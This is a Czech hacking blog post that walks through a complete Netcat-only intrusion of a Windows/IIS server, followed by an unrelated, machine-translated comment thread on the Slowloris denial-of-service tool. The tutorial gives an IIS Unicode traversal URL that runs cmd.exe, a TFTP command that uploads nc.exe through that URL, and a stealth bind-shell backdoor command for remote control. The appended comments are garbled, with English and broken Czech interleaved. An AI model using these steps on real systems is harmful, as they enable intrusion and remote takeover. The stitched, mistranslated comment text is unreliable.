Hacking s Netcatem

Napsal Hacker7.bloger.cz (») 10. 2. 2011 v kategorii netcat, přečteno: 6475×

Ke stazeni zde: http://www.soom.cz/index.php?name=download/kategorie&sid=5

Pak staci nakopirovat do C:\WINDOWS a vse by melo jit.

NetCat je utilita, která je schopná odesílat a přijímat data přes TCP a UDP spojení. NetCat může být použit jako port scanner, backdoor, port redirector, port listener a ještě na spoustu dalších cool věcí.Není to vždycky nejlepší nástroj pro práci, ale pokud bych se dostal ne opuštěný ostrov, tak bych si chtěl vzít NetCat s sebou. V tomhle návodu budu demonstrovat kompletní hack jenom s využitím NetCatu, abych ukázal, jak mnohostranný nástroj to je.

Scannování portů s NetCatem

Scannování si ukážeme hned na příkladu "nc -v -w 2 -z target 20-30". NetCat se bude pokoušet připojit na každý port mezi 20 a 30. Přepínač -z předchází posílání dat do TCP spojení a limituje data na UDP spojení. Přepínač -i vkládá mezeru mezi každé vyzkoušení portu. Ačkoli může být NetCat použit pro scannování portů, tak to není jeho nejsilnější stránka. Nástroje jako Nmap jsou pro scann portů daleko lepší.

NetCat

Scannovali jsme 192.168.1.1, porty 1-200. Kromě ostatních můžeme vidět otevřené porty 80, 21 a 25...



Banner Grabbing s NetCatem

Tak teď chceme zjistit, co běží na portech 80 a 21. K získání banneru můžeme použít NetCat následujícím způsobem.

NetCat

NetCat

Tak teď víme, že se pravděpodobně jedná o systém Windows 2000, protože na něm běží server IIS 5.0 a Microsoft FTP Service.

Tak a teď pojďme poslat na server upravené URL, kterým se pokusíme exploitnout "File Traversal vulnerability" na nepatchovaným serveru. Na vyzkoušení budeme používat NetCat a když to půjde, tak NetCat na server uploadneme a ukážeme si, jak můžeme NetCat využít jako backdoor.

Pokud nevíte, co je to ten "Unicode File traversal exploit", můžete se podívat na web a hledat něco jako "IIS Unicode File Traversal". (Dneska už to asi nebude fungovat, ale na demonstraci NetCatu to musí stačit.)

NetCat

Super! Poslali jsme na server URL: http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c: k napadení IIS serveru a to co vidíme je adresář na disku serveru.

Výborně! Teď chceme na server uploadnout NetCat. Tak použijeme TFTP a integrujeme TFTP příkaz do upraveného URL.

NetCat

tftp -I 192.168.1.9 GET nc.exe

Se přetransformuje do:

http:///c+TFTP+-i+192.168.1.9+GET+nc.exe

Pomocí prográmku TFTPD teda dáme NetCat ne server.

NetCat



NetCat jako backdoor

Tak a teď máme NetCat uploadnutý na serveru a chceme ho použít k vytvoření zadních vrátek (backdoor), aby jsme získali vzdálený příkazový řádek.
K použití NetCatu jako backdoor potřebujeme, aby naslouchal na nějakém vybraném portu (my se vybereme třeba port 10001), abychom se na něj mohli připojit z našeho počítače... samozřejmě použitím zase NetCatu :))

Příkaz, který pošleme na server vypadá nějak takhle :

nc -L -p 10001 -d -e cmd.exe

A tady k tomu máme vysvětlivky :

nc -> spustí NetCat
-L -> říká NetCatu, aby čekal na příchozí spojení
-p -> port, na kterém NetCat čeká
-d -> stealth mode
-e -> spustí nějaký program (cmd.exe) a čeká na příchozí spojení

Teď když budeme tenhle příkaz chtít přetransformovat zase na URL :

http:///c+nc+-L+-p+10001+-d+-e+cmd.exe

No a teď uź zbývá jenom NetCat spustit naostro...

NetCat

Nyní bychom měli mít spuštěný NetCat naslouchající na portu 10001. Teďka se z naší mašiny připojíme na NetCat na serveru.

NetCat

Máme vzdálený příkazový řádek serveru a můžeme ho plně ovládat.

Přenos souborů pomocí NetCatu

Pojďme se podívat na ostatní možnosti, které NetCat poskytuje. Chceme přenést soubor hack.txt na server a z nějakého důvodu nemůžeme použít TFTP. Můžeme použít NetCat...

Na přijímání souboru hack.txt musí být NetCat na serveru nastaven takto :

nc -l -p 1234 >hack.txt

NetCat

Z našeho počítače odešleme soubor následovně :

nc destination 1234

NetCat

A takhle vypadá soubor hack.txt

NetCat

A…Voila!

NetCat

Vidíme, že soubor hack.txt byl úspěšně přenesen na server přes port 1234.

Hodnocení:     nejlepší   1 2 3 4 5   odpad

Komentáře

Zobrazit: standardní | od aktivních | poslední příspěvky | všechno
Trénuj z IP 74.120.12.*** | 25.5.2011 19:11
# RSnake říká:
June 17th, 2009 at 3:22 pm 17.června 2009 v 15:22

@phoenix @ Phoenix

mod_bandwidth only works with Apache 1.3. mod_bandwidth pracuje pouze s Apache 1.3.

mod_evasive does nothing to stop this unless it tells something else to firewall the user off. mod_evasive nedělá nic zastavit toto, pokud to řekne něco jiného, ​​aby firewall uživatel off. I didn't try every configuration but it doesn't appear to do much against Slowloris unless it communicates it's problems to something that has a chance of dealing with it on Apache's behalf. Nechtěl jsem zkoušet každou konfiguraci, ale nezdá se to moc proti Slowloris pokud komunikuje to problémy, na něco, co má šanci se s nimi vyrovnat se jménem Apache.
# lighty Says: Lighty říká:
June 17th, 2009 at 3:43 pm 17.června 2009 v 15:43

Did you test it slowloris on other webserver stacks? Věděli jste, že test slowloris na jiných webserver komíny?

Like nginx, lighttpd, cherokee… which are more “high-performance” oriented webersers? Stejně jako nginx, lighttpd, cherokee ... které jsou více "high-performance" orientované webersers? or we just talking as and a apache specific “DoS”? nebo jsme si povídali, jak a apache zvláštní "DoS"?

Regards S pozdravem
# thrill Says: vzrušení říká:
June 17th, 2009 at 6:12 pm 17.června 2009 v 18:12

@Matt Presson @ Matt Presson

How do you suggest blocking BySpoofedIP ? Jak se vám navrhnout blokování BySpoofedIP? smile
# blah Says: bla říká:
June 17th, 2009 at 8:36 pm 17.června 2009 v 20:36

Billy Hoffman AKA “Acidus” Billy Hoffman AKA "acidus"

“as an aside how is this not arming script kiddies?” "Jako stranou, jak je to se neaktivoval skript kiddies?"

lol@arming. Maybe Bob doesn't want to end up like you, who does nothing but yap and never releases any code. lol @ ozbrojování. Možná, že Bob nechce skončit jako ty, kdo nedělá nic, ale štěkat a nikdy uvolňuje nějaký kód. I've heard you more then a DOZEN times say you would release something after a talk and never have. Slyšel jsem, že více než desetkrát říct, že by něco po uvolnění mluvit a nikdy mít. Your full of hot air. Vaše celé horkého vzduchu. You have a rep based on talking fast. Máte-rep na základě mluví rychle.

teh kidz already have tens of thousands compromised machines, that's how his PERL SCRIPT isn't “arming” them.
# sirdarckcat Says: sirdarckcat říká:
June 17th, 2009 at 8:48 pm

mod_evasive sucks, and mod_bandwidth is broken.

your best bet is iptables and limit max simultaneous connections / ip.

anyway.. I think it's important to state clear that what you are exhausting is apache's maxclients directive (I know that you cannot fix this just increasing the number, but what your attacks is exhausting is that).

A friend showed this to me a couple of mins ago:
seclists.org/fulldisclosure/2009/Jun/0188.html

Just plain stupid, haha

Greetz!!
# id Says:
June 17th, 2009 at 9:05 pm

@sirdarckat

MaxClients is only what limits how long it takes to hang a site, and only by a few seconds max. Consider an average httpd process takes up between 3MB-10MB of ram, that's only 350-100 httpd processes per GB of ram. And the average server probably has 4-8GB right now, so even with a very high MaxClient setting the server would run out of physical ram with very few packets sent.

As for the FD guy…I hope he takes his blood pressure medicine…
# Wireghoul Says:
June 17th, 2009 at 9:13 pm

I'm surprised mod_choke hasn't been mentioned. Is it considered to “unstable” ?

Also, spotted this typo on the slowloris page;
In considering the ramifcations of a slow denial of service attack against
# Christian Folini Says:
June 17th, 2009 at 11:08 pm

Very nice to see somebody write about this topic. The question has been raised on the apache users list in 2007. All we got from apache was the same stupid tips page, which ignores this particular problem completely. See the thread at tinyurl.com/mbkhr9

I did some research on this, but never actually released it. Udělal jsem nějaký výzkum na toto, ale nikdy vlastně pustil to. If somebody is interested in it, then get in touch with me at netnea.com. Pokud někdo má zájem, pak dostat do kontaktu se mnou na netnea.com.

Actually RSnake, you are going in the right direction with slowloris. Vlastně RSnake, jdete správným směrem s slowloris. However, there is a lot of room for additional nastiness. Nicméně, tam je velký prostor pro další ošklivost. Ie working with file uploads instead of http headers (http-headers limit you to a max connection duration of LimitRequestFields * Timeout), file uploads do not really have a connection duration limit. Tj. práce s obrázky souboru namísto http hlaviček (http-hlavičky limit, abyste délce max. spojení LimitRequestFields * Timeout), nahrávání souborů opravdu nemají doba trvání spojení limit. And from the way Apache works, just about anybody is allowed to _send_ in a file. A od toho, jak Apache funguje, jen asi je někdo dovoleno _send_ v souboru. Apache won't necessarily accept it, but as a start, it will try and swallow it completely. Apache se nemusí přijmout, ale jako start, bude to zkusit a spolknout to kompletně. ModSecurity could help you a bit though. ModSecurity by vám mohly pomoci trochu ačkoli.

What I have not tried out is hacking the ssl handshake. Co jsem se snažil ven je hacking ssl handshake. I am confident you would be able to get the same DoS effect and hide from the access log that way. Jsem přesvědčen, byste být schopni získat stejný efekt DoS a schovávat se před přístupu log tímto způsobem.

I am happy somebody with some leverage finally made this public. Jsem rád, někdo s nějakým vliv konečně této veřejné. I've been sitting on my research on the topic for too long. Byl jsem seděl na mém výzkumu na toto téma příliš dlouho.
# aykay Says: aykay říká:
June 18th, 2009 at 12:21 am 18.června 2009 v 00:21

There is already a way to define a maximum number of connections per source IP address. Již existuje způsob, jak definovat maximální počet připojení na zdrojové IP adresy. You even don't have to “tweak” mod_security to achieve that. Můžete dokonce nemusíte "vyladit" mod_security pro dosažení tohoto.
Alternative to limit max simultaneous connections with iptables you could use the apache module: mod_qos (http://mod-qos.sourceforge.net/). Alternativa k omezení max. souběžných spojení s iptables můžete použít modul Apache: mod_qos (http://mod-qos.sourceforge.net/).
It can limit the number of concurrent connections for a singe IP source address by defining the configuration option QS_SrvMaxConnPerIP. To může omezit počet současných připojení k připálit adresu zdrojové IP tím, že definuje možnost konfigurace QS_SrvMaxConnPerIP.
mod_qos could also be configured to allow a server to support keep-alive as long as sufficient connections are free, but to disable the keep-alive support when a defined connection threshold (QS_SrvMaxConnClose) is reached. mod_qos mohl také být nakonfigurován tak, aby server pro podporu keep-alive tak dlouho, jako dostatečný připojení zdarma, ale vypnout keep-alive podpora při dosažení definované spojení práh (QS_SrvMaxConnClose).
# phoenix Says: Phoenix říká:
June 18th, 2009 at 12:46 am 18.června 2009 v 00:46

@Rsnake > I did compile mod_bandwidth on Apache 2.2 with no problem @ Rsnake> jsem zkompilovat mod_bandwidth na Apache 2.2 bez problémů
# Hugo Says: Hugo říká:
June 18th, 2009 at 1:07 am 18.června 2009 v 01:07

@Rsnake, how do you protect your webserver from that? @ Rsnake, jak si chránit svůj webový server, z toho? I see that my ip got blacklisted after running slowloris.pl against ha.ckers.org. Vidím, že moje ip dostal na černou listinu po spuštění slowloris.pl proti ha.ckers.org. I guess youre running apache too, right? Myslím, že jsi apache taky, že jo?

slowloris.pl manpage says “lighthttpd” not affected, well, webservers name is “lighttpd” instead. slowloris.pl manpage říká: "LightHTTPD" není ovlivněna, dobře, webservery jméno je "lighttpd" místo.
# Wladimir Palant Says: Wladimir Palant říká:
June 18th, 2009 at 5:59 am 18.června 2009 v 05:59

> Anyway, I hope this gets people thinking about better web server architecture. > Mimochodem, doufám, že to dostane myšlení lidí o lepší webový server architektury.

Definitely. Rozhodně. I used to run Apache - until a year ago my server simply went down due to memory exhaustion. Kdysi jsem spustit Apache - až před rokem můj server prostě šel dolů kvůli vyčerpání paměti. Took me some time to figure out what was going on and that it wasn'ta DoS attack. Trvalo mi nějaký čas zjistit, co se děje a že to nebyl útok DoS. It was simply due to keep-alive being enabled on a directory where many clients downloaded a small file from. Bylo to prostě kvůli keep-alive být povolena na adresář, kde se mnoho klientů stáhnout malý soubor. That resulted in tons of open connections (keep alive timeout was 150 seconds which used to be the default I guess) that weren't doing anything but just sitting there and wasting lots of memory. , Která vyústila v tunách otevřených spojení (keep alive timeout byla 150 sekund, která používá jako výchozí myslím), že nedělali nic, ale jen tam sedí a plýtvání velké množství paměti. This finally made me install nginx and I still cannot believe how much difference that made. Toto nakonec se mi nainstalovat nginx a já stále nemohu uvěřit, jak moc tím rozdílem, že se. nginx uses a single-threaded approach which is both less wasteful and apparently allows for a far better performance if done correctly. nginx používá jeden-závitové přístup, který je zároveň méně nákladné a zřejmě umožňuje mnohem lepší výkon, pokud provádí správně.
# Ralf Says: Ralf říká:
June 18th, 2009 at 6:52 am 18.června 2009 v 06:52

Its possible to retrieve the PID of the Apache process that serves the request: Jeho možné získat PID procesu Apache, který slouží dotaz:

ralf.stormbind.net/wp-content/uploads/2008/ 05/retrieve-remote-apache-pid.txt ralf.stormbind.net/wp-content/uploads/2008/ 05/retrieve-remote-apache-pid.txt

This maybe (or maybe not, i dont know) useful in slowloris to calculate to load (eg. many non uniqe pids -> much load) of the server. Tato možná (nebo možná ne, nevím) užitečné slowloris pro výpočet zatížení (např. mnoho non unikátním pidů -> hodně zatížení) serveru.
# kmike Says: kmike říká:
June 18th, 2009 at 6:59 am 18.června 2009 v 06:59

Yes, it's interesting if this type of attack is effective against the state machine-based web servers such as nginx or lighttpd. Ano, je to zajímavé, pokud je tento typ útoku je efektivní proti státní mašinérii-založené webové servery, jako je nginx nebo lighttpd.
Also, Nginx can limit the number of connections per IP (don't know if lighttpd has a similar feature), thus more attacking IPs are needed to achieve the same result. Také si Nginx omezit počet spojení na IP (nevím, jestli lighttpd má podobnou funkci), tedy více útočící IP jsou nutné k dosažení stejného výsledku.
# Zac B Says: Zac B říká:
June 18th, 2009 at 7:13 am 18.června 2009 v 07:13

Kudos on finding a problem… and kudos to the commenters finally getting over the knee jerk reaction and getting to the meat of the matter. Sláva na nalezení problému ... a sláva na commenters konečně dostává přes koleno reakce blbec a dostat se na maso ze věci.

Actually, I'd like to comment on the discussion (and not the DoS issue) cause I think people may miss the opportunity to learn valuable lessons from this: “fix or mitigate the problem *first*” & “don't take it personally”. Vlastně bych se rád vyjádřil k diskuzi (a není problém DoS), protože jsem si mohou lidé nechat ujít příležitost učit se cenné ponaučení z tohoto: "oprava nebo zmírnění problému * prvním *" a "neberte to osobně ".

You don't like that someone finds a problem? Se vám nelíbí, že někdo najde nějaký problém? Tough. Těžké. Saying that it's nothing new and that other issues 'do the same thing' isn't helping. Pověst, že to není nic nového a že další otázky 'udělat to samé' není pomoci. That fact of the matter is that 'do the same thing' doesn't not mean 'does it the same way'. Že skutečnost, že věc je, že 'to samé' není neznamená 'to stejným způsobem'. Fix/mitigate the new issue. Opravit / zmírnění nové vydání.

Example (albeit extreme): Bullets kill people; poison kills people. Příklad (byť eXtreme): Odrážky zabíjet lidi, jed zabíjí lidi. Bullet-proof vests mitigate bullets… not so much for poison (though it does depend on the delivery mechanism for the poison). Bullet-důkaz vesty zmírnění kulky ... ani ne tak pro jed (i když to záleží na mechanismus pro jed). Just because the end result of these two threats are the same does not make the methods and protections the same. Jen proto, že konečný výsledek těchto dvou hrozeb jsou stejné nedělá metod a ochrany stejné.

Don't take issues personally. Neužívejte otázky osobně. This is like arguing over which hammer is best… but if all you need to do is put a nail in a wall, does it really matter if you use an 14oz smooth-headed claw hammer with a wood handle instead of a 20oz drywaller's hammer with a metal shaft? To je jako argumentovat, ve kterém kladivem je nejlepší ... ale pokud vše, co potřebujete udělat, je dát hřebík do zdi, to opravdu jedno, jestli používáte 14oz hladký-šel tesařské kladivo s dřevěnou rukojetí, místo 20oz drywaller kladívka s kovový hřídel? Not one bit. Ani jeden bit.

So, just cause someone finds a flaw in your favorite app/tool/os doesn't mean they are attacking you or even your favorite app/tool/os. Takže, jen způsobí někdo najde chybu ve svém oblíbeném app / nástroj / os neznamená, že vás útočí, nebo dokonce vaší oblíbené aplikace / nástroj / os. In fact you should greet this revelation with a smile cause usually it'll mean things will improve. Ve skutečnosti byste měli pozdravit toto zjevení s úsměvem příčinou obvykle to bude znamenat věci zlepší.

RSnake has done a great service to the Apache community and I agree that he response from Apache of RTFM was insufficient. RSnake udělal velkou službu pro komunitu Apache a souhlasím s tím, že reakce z Apache RTFM byla nedostatečná.

BTW: before you flame me for being off topic - my current specialty (aka: my day job) is Security Analyst and not Web/Server admin, so other than mastering multiple ways to say the word “no” I have to daily look at the 'how' of responses and see if the 'how' can be improved.
# Zac B Says:
June 18th, 2009 at 7:15 am

damn straight… though there is one other option: not to read our posts after clicking on the 'submit' button. : P

# Acidus Says:
June 17th, 2009 at 11:30 am

sweet jesus Firefox needs to a grammar checker to tis speel checker. Or I need to learn English. Hmmm I know which is more likely smile
# MaXe Says:
June 18th, 2009 at 10:52 am

Very nice RSnake, I really appreciate when PoC's like this are released. It helps me learn and understand more about computers (and programming, no matter how poor my best hello_world() are).

Keep up the good work! Pokračovat v dobré práci!

Best Regards, S pozdravem,
MaXe Maxe
# GeorgZ Says: GeorgZ říká:
June 18th, 2009 at 11:02 am 18.června 2009 v 11:02

I guess the actual “idea” is *really* old (> 5 years). Myslím, že skutečný "nápad" je * opravdu * staré (> 5 let). It reminds me to Lutz Donnerhackes “Teergrube” (SMTP) for slowing down spammers. Připomíná mi Lutz Donnerhackes "Teergrube" (SMTP) pro zpomalení spammery.
I agree that something like MaxClientsPerIp should be present in Apache, but unless you figure out why IIS behaves more “intelligent”, I would just say that Apache is more tolerant for slow clients. Souhlasím s tím, že něco jako MaxClientsPerIp by měla být přítomna v Apache, ale pokud si zjistit, proč IIS se chová více "inteligentní", já bych jen říct, že Apache je více tolerantní k pomalé klienty.
# rvdh Says: rvdh říká:
June 18th, 2009 at 6:52 pm 18.června 2009 v 18:52

There are more roads that lead to rome: Existuje více cest, které vedou do Říma:

httpd.apache.org/docs/1.3/misc/fin_wait_2.html httpd.apache.org/docs/1.3/misc/fin_wait_2.html
# id Says: id říká:
June 18th, 2009 at 9:23 pm 18.června 2009 v 21:23

Couple more suggestions of “solutions” that I tested today. Pár dalších návrhů "řešení", které jsem testoval dnes.
cband - nope cband - Ne
MPM worker - nope MPM pracovník - ani náhodou
dosevasive - couldn't find the source, if anyone has a pointer I'll try it. dosevasive - nemohl najít zdroj, pokud má někdo ukazatel Zkusím to.

Also, there's been large percentage of posters on this, and various other forums, saying it's a very old/well known/easily defended against issue. Také, tam bylo velké procento plakátů na tomto, a různých jiných fórech, říká, že je to velmi starý / známé / snadno bránil proti vydání. However no one has posted a link to any code that does the slow and low bandwidth approach. Nicméně nikdo zveřejnil odkaz na nějaký kód, který se pomalu a malou šířkou pásma přístup. I'd be interested to see the code, and compare the various suggested protections. Já bych měla zájem vidět kód, a porovnat různé navrhované ochrany.

I am also very curious to know why, if this is so well know, it isn't commonly used in attacks (this site has had quite a few DoSings, none similar). Jsem také velmi zvědavý vědět, proč, jestli je to tak dobře víte, to není běžně používané v útoku (toto místo má docela málo DoSings, žádný podobný). Maybe it's because everyone else (except every site we've tried) is implementing their super secret protections they aren't sharing? Možná je to proto, že všichni ostatní (kromě všech stránkách jsme se snažili), provádí jejich tajný ochrany nejsou sdílení?
# Roland Dobbins Says:
June 18th, 2009 at 10:50 pm

I've read through all of this, and through the TCP vectors discussed in the latest Phrack, and I see absolutely *nothing* new here from either a conceptual or an actualization standpoint. All these things and more have been seen in the wild for a decade or more (by me personally, I'm not reporting second- or third-hand).

It's good to see that folks in the security research/infosec communities are finally starting to think about DDoS and all its implications, but the concept of prior art is still apparently something few security researchers (and academics, for that matter) seem to grasp. Je dobré vidět, že lidé v oblasti bezpečnostního výzkumu / INFOSEC komunity se konečně začínají přemýšlet o DDoS a všechny jeho důsledky, ale představa o stavu techniky je ještě zřejmě něco málo zabezpečení badatelů (a akademických pracovníků, když na to přijde) Zdá se, že pochopit. Before investing the time and effort to write a tool which duplicates attacks seen over and over again in the wild by operational security (opsec) folks, and before making an announcement that something is new and different which in actuality has been seen and dealt with by others over and over again, a bit of due diligence ought to be undertaken, IMHO. Před investováním času a úsilí napsat nástroj, který zdvojuje útoky vidět znovu a znovu v divočině provozní bezpečnosti (OPSEC) lidí, a před provedením oznámení, že je něco nového a odlišného, ​​která ve skutečnosti byla pozorována a zabýval se tím, jiní znovu a znovu, měl trochu due diligence mají být přijata, IMHO.

Also, note that there are in fact quite a few countermeasures for dealing with such attacks, including architecture, configuration, and even dedicated DDoS mitigation devices [full disclosure; I work for a company which makes such devices]. Také si všimněte, že tam jsou ve skutečnosti poměrně málo protiopatření k zacházení s takovými útoky, včetně architektury, konfigurace, a dokonce i specializované DDoS zmírnění zařízení [úplné zveřejnění, jsem pracovat pro společnost, která dělá tyto prostředky]. It's also important to note that, far from providing any materially useful security benefit, load-balancers actually tend to increase vulnerability to DDoS due to all the state they instantiate, and so it's important to ensure that one's various reaction mechanisms (S/RTBH, dedicated DDoS mitigation devices, et. al.) are located northbound of the load-balancers so as to protect them as well as the load-balanced instances southbound of them. Je také důležité si uvědomit, že zdaleka neposkytují žádné věcně užitečné zabezpečení, load-balancer skutečně mají tendenci zvyšovat náchylnost k DDoS kvůli všem stavu, ve kterém instance, a proto je důležité zajistit, aby něčí různé reakční mechanismy (S / RTBH, vyhrazené DDoS zmírnění zařízení, et al..) se nachází na sever-balancerů zatížení tak, aby byly chráněny, stejně jako náklad-vyvážené instance southbound z nich.

This in no way diminishes the value of discussion To v žádném případě nesnižuje hodnotu diskuze
# sirdarckcat Says: sirdarckcat říká:
June 18th, 2009 at 11:30 pm

> super secret protections they aren't sharing
well, they are *very easy* to implement, but ok..

In my case I've used several ways depending on the day (if the weather is hot, I dont use perl, if the weather is cold I dont use python, so I used bash), this is a extract from a cronjob running every 5 minutes on the webserver.. with a very simple script that detected plain-dumb same-ip attacks (there are further iptables rules limiting the amount of new connections per minute, so the attack of exhausting maxclients from the same IP is impossible in less than 5 minutes):

# bloke999 style dos
netstat -an | grep \:80\ .*ESTABLISHED | sed s/^.*ffff:// | tr : ” ” | awk '{a[$1]++ } END{for(i in a){if(a[i]>10)print “-I INPUT -s ” i ” -j DROP”}}' > /home/sdc/export/iptables_bloke.txt
# dec2006 style dos
netstat -an | grep \:80\ .*TIME_WAIT | sed s/^.*ffff:// | tr : ” ” | awk '{a[$1]++ } END{for(i in a){if(a[i]>30)print “-I INPUT -s ” i ” -j DROP”}}' > /home/sdc/export/iptables_wait.txt

I have another python script running on the DNS server polling /server-status doing the same (with a higher frequency), but instead of dropping the packets it configures the server to respond differently to those IPs, pointing the domains to 192.168.0.1 (the ttl is low).

I dont know why no one attacks ckers.org with this technique but at least they have attacked me, and a friend's forum like this several times.

A lot of websites are easy to DoS like this.. I sincerely can't think on any public tool that does this, so I understand why the “new” word can be used to describe slowloris.

Anyway, smile

Greetings!!
# Hugo Says: Hugo říká:
June 19th, 2009 at 5:47 am 19.června 2009 v 05:47

The remedy: www.hiawatha-webserver.org/ Náprava: www.hiawatha-webserver.org/
# Paul Says: Pavel říká:
June 19th, 2009 at 6:09 am 19.června 2009 v 06:09

@ Every limelight wanting researcher. @ Každý centru pozornosti chce výzkumník.

Who gives a damn if it's been discussed before? I certainly don't. I'm just a hobbiest who's curious about how things work, things like Apache. Robert isn't trying to take credit. You'll notice it wasn't him who posted this on FD, which is a den of attention whores, skiddies who talk about how elite they are because they discovered Amazon has an XSS vuln, and fly-by-night security firms pushing their latest whitepaper.

But I digress…

In trying this out (I must stress the -test flag, not actual attacks) I found a interesting general rule: If it involves money and it's large, 90 percent of the time it's around 100 seconds. If it's a personal site, only 10 percent of the time does it not go to 500.

RSnake: I got the script to seg fault. Where do I report it or possibly submit improvements and, while I understand your busy, will you update this script?
# Charles Darke Says:
June 19th, 2009 at 8:08 am

it may well be used in 'real' attacks. But since reducing timeout or using other countermeasures can defeat this attack, the attack must degenerate into a standard DOS attack to remain effective.
# RSnake Says: RSnake říká:
June 19th, 2009 at 8:55 am

@Paul - do you mean that Perl segfaulted? I don't see how my program could manage to do that by itself. But yes, if there's some changes that would make the program better, just email them to me. My email address is on the about us page.

And welcome slashdot!
# Paul Says:
June 19th, 2009 at 9:40 am

It could have I just set it up on the box I was testing it on and haven't set up perl in a while. Probably was one of the scripts dependencies. Could have been the fact I was running it though torify to see if it would be feasible to do this attack though tor (providing an instant proxy).

I'll try to reproduce it. Thanks. Díky. And don't not to listen to the kids saying you rip off others work.

And congrats on being slashdotted (again, IIRC). I have your blog RSS'd so I had it first smile
# EternaL Says:
June 19th, 2009 at 10:42 am

Oh my god, what a nice tool !!!

Great job dude, really surprised you share it for free.
Anyway, good wark !

Regards.
# RSnake Says: RSnake říká:
June 19th, 2009 at 10:49 am

Apache's take on this issue (part two) - still not worth thinking about. They closed the bug that this guy opened: issues.apache.org/bugzilla/show_bug.cgi?id=47386
# karavelov Says:
June 19th, 2009 at 11:22 am

I have tested this DOS attach against lighttpd and nginx. Out of the box both servers are vulnerable (despite the note in the announcement that lighttpd is not vulnerable, just use enough number of connections). Nginx could be configured to not be affected by this type of attacks:
Put in “http” section:

client_body_timeout 10;
client_header_timeout 10;
keepalive_timeout 10;
send_timeout 10;
limit_zone limit_per_ip $binary_remote_addr 1m;

#and put in “server” section :
limit_conn limit_per 16;

the last lines are for limiting connection numbers per clent IP.

May be lighttpd could be configured in a similar manner but I am not a spec in it.

Best regards
# RSnake Says: RSnake říká:
June 19th, 2009 at 11:32 am

Incidentally we have a new working theory. Our theory is that no Apache module as it stands right now can fix this. We tried mod_security's “drop” on a single IP address, which should send a FIN immediately upon seeing that IP address. Unfortunately it too was unable to stop this. I think possibly the Apache modules are just called too late. We tried the same thing with .htaccess denys but that only denies once the connection is complete, and mod_security runs after .htaccess. I can't confirm this theory but maybe someone who is more familiar with Apache internals can.
# RSnake Says: RSnake říká:
June 19th, 2009 at 11:36 am 19.června 2009 v 11:36

Ivan Ristic confirmed that mod_security runs too late, although it still might be possible to write a module that can defend against this. Ivan Ristic potvrdil, že mod_security běží příliš pozdě, ačkoli to ještě mohlo být možné napsat modul, který umí bránit proti této. He also confirmed that there are no good workarounds built into any existing modules that he is aware of - or even to simpler DoS scenarios as well. Ten také potvrdil, že neexistují žádné dobré řešení zabudované do existující moduly, které si je vědom - nebo dokonce jednodušší DoS scénáře stejně. It's been something he's wanted to write, but it doesn't currently exist. Bylo to něco, co se chtěl napsat, ale v současné době neexistuje.
# RSnake Says: RSnake říká:
June 19th, 2009 at 11:37 am 19.června 2009 v 11:37

@karavelov - can you tell us what configuration of Slowloris you used? @ Karavelov - můžete nám říci, co konfiguraci Slowloris jste použili? Perhaps my defaults weren't well suited for attacking those…? Možná, že mé selhání nebyli dobře hodí pro útočící ty ...?
# Joe Says: Joe říká:
June 19th, 2009 at 11:41 am 19.června 2009 v 11:41

Why can't setting keep alives to a lower number not help here? Proč nemůže mít nastavení alives k nižšímu počtu nepomůže tady?
# Wireghoul Says: Wireghoul říká:
June 19th, 2009 at 12:46 pm 19.června 2009 v 12:46

@RSnake @id @ @ Id RSnake

Did you try mod_choke? Zkusili jste mod_choke? If your distro doesn't already have it, consult modules.apache.org/ for source Pokud váš distro ještě nemá to, poraďte modules.apache.org/ pro zdroje
# RSnake Says: RSnake říká:
June 19th, 2009 at 1:05 pm 19.června 2009 v 13:05

@Wireghoul - nope but we can try it out. @ Wireghoul - Ne, ale můžeme to vyzkoušet.

For those if you who are following this we've looked at pretty much everything you can possibly do with your Apache config and we've been trying all of your suggestions. Pro ty, kteří jsou-li na základě tohoto jsme se podíval na skoro všechno, co můžete udělat s vaším Apache config a my se to snažíme všechny vaše návrhy. One guy on slashdot mentioned this configuration so we tried it out and it looks like it solves the _default_ Slowloris attack: Jeden chlap na Slashdot se zmínil o tomto nastavení, takže jsme se snažili ho a vypadá to, že řeší _default_ Slowloris útok:

Timeout 5 Timeout 5
KeepAliveTimeout 0 KeepAliveTimeout 0

The problem is if you set -timeout to 4 Slowloris wins again (assuming fairly low latency). Problém je, pokud si set-timeout na 4 Slowloris vyhraje znovu (za předpokladu, že poměrně nízká latence). It's all about how long you allow the socket to stay open. Je to všechno o tom, jak dlouho vám umožní zůstat otevřené zásuvky. This will break all kinds of stuff by doing this though, as Acidus mentioned above. To bude přestávka všechny druhy věcí, které dělá to i když, jak acidus je uvedeno výše.
# Tim McGuire Says:
June 19th, 2009 at 2:31 pm

I tested this against tomcat and as expected it works great ( from vmware ).
# Ed Says:
June 19th, 2009 at 2:51 pm

How is this possible ?

“If your server used UDP and I re-wrote Slowloris to speak UDP it would work too.”

gaia.cs.umass.edu/kurose/transport/UDP.html
# RSnake Says: RSnake říká:
June 19th, 2009 at 2:54 pm

@Ed MINA is just one example - www.ashishpaliwal.com/blog/2008/10/what-is-apache-mina/ Most of the UDP web servers I've seen are experimental. I was only speaking hypothetically.
# Ed Says:
June 19th, 2009 at 2:58 pm

@RSnake, hypothetically how would you hold a connectionless protocols connection open ? DNS uses udp/tcp, lets say your requests are
# Ed Says:
June 19th, 2009 at 2:58 pm

oops less than 512K
# RSnake Says: RSnake říká:
June 19th, 2009 at 3:00 pm

@Ed - I'd hold them open in the same way however that UDP service naturally held them open. UDP is stateless but that doesn't mean whatever is supervising it has to be stateless. In the same way that HTTP is stateless - we've invented cookies that the browser and the server use between them to create state over a stateless protocol.
# Jay Says:
June 19th, 2009 at 4:34 pm

Does anyone have the iptables rule to slow/stop this attack?
# Pablo Says:
June 19th, 2009 at 6:14 pm

Hi there, I'm memeber of cherokee's mail list and I received a message from one of the cherokee guys saying that he performed a DoS attack to a cherokee server using this technique and it passed the test!
I can't guarantee this but I trust the community.
So, consider add it to your list ;)
For those that thought give cherokee a chance… Give it! I fell in love for the first time I used it.
Cheers
# Mike Adewole Says:
June 19th, 2009 at 6:35 pm

The solution to this problem is actually what separates web sites from web applications in my opinion: request serialization.

If a web server is designed to serve web sites, like apache is designed to do, then the server will attempt to serve multiple requests simultaneously without serializing the requests in any way(eg by ip address).

On the other hand, a web server that is designed to serve web applications (like the custom server running www.botslist.ca ) should serialize the requests so that multiple requests from the same ip (and/or port depending on the environment) are served by the same thread. That thread will then use the http host header and session token to serve the request within the proper user context/state.

